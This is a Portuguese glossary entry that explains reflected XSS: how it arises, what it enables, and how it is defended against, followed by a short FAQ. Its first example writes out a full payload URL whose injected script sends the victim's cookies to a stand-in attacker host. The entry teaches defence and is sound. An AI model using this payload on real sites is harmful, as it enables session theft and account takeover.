XSS Refletido
O que é XSS Refletido?
XSS RefletidoXSS não persistente em que a entrada controlada pelo atacante é imediatamente refletida na resposta e executada no navegador da vítima.
O XSS refletido (não persistente, Tipo 1) ocorre quando uma aplicação web recebe dados de uma requisição HTTP — normalmente um parâmetro de URL ou campo de formulário — e os ecoa na resposta sem codificação de saída adequada. O ataque requer que a vítima clique num link forjado, sendo geralmente distribuído por phishing, malvertising ou mensagens. A exploração bem-sucedida permite roubar cookies de sessão, executar ações em nome do utilizador ou levar a uma tomada total de conta. As defesas incluem codificação HTML sensível ao contexto, uma Content Security Policy rigorosa e frameworks que fazem auto-escape dos templates.
● Exemplos
- 01
https://exemplo.com/search?q=<script>document.location='https://mau/?c='+document.cookie</script>
- 02
Página de erro que reflete um parâmetro 'message' sem sanitização diretamente no DOM.
● Perguntas frequentes
O que é XSS Refletido?
XSS não persistente em que a entrada controlada pelo atacante é imediatamente refletida na resposta e executada no navegador da vítima. Pertence à categoria Ataques e ameaças da cibersegurança.
O que significa XSS Refletido?
XSS não persistente em que a entrada controlada pelo atacante é imediatamente refletida na resposta e executada no navegador da vítima.
Como se defender contra XSS Refletido?
As defesas contra XSS Refletido costumam combinar controles técnicos e práticas operacionais, conforme detalhado na definição acima.
Quais são outros nomes para XSS Refletido?
Nomes alternativos comuns: XSS não persistente, XSS Tipo 1.